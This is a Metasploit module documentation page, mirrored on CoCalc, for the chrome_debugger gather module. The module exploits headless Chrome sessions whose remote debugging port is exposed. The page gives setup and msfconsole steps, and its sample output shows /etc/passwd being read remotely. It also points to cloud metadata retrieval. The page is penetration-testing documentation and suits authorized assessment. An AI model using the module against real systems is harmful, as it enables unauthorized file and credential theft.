CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/auxiliary/gather/chrome_debugger.md
Views: 11784

Vulnerable Application

This module takes advantage of misconfigured headless chrome sessions and either retrieves a specified file off the remote file system, or makes a web request from the remote machine.

This can be useful for retrieving cloud metadata in certain scenarios. Primarily this module targets developers.

A vulnerable Headless Chrome session can be started with the following command:

$ google-chrome --remote-debugging-port=9222 --headless --remote-debugging-address=0.0.0.0

This will start a webserver running on port 9222 for all network interfaces.

Verification Steps

  1. Start msfconsole

  2. Execute auxiliary/gather/chrome_debugger

  3. Execute set RHOST $REMOTE_ADDRESS

  4. Execute set RPORT 9222

  5. Execute either set FILEPATH $FILE_PATH_ON_REMOTE or set URL $URL_FROM_REMOTE

  6. Execute run

Options

FILEPATH

The file path on the remote you wish to retrieve.

URL

A URL you wish to fetch the contents of from the remote machine.

Note: One or the other must be set!

Scenarios

[*] Attempting Connection to ws://192.168.20.168:9222/devtools/page/CF551031373306B35F961C6C0968DAEC [*] Opened connection [*] Attempting to load url file:///etc/passwd [*] Received Data [*] Sending request for data [*] Received Data [+] Retrieved resource [*] Auxiliary module execution completed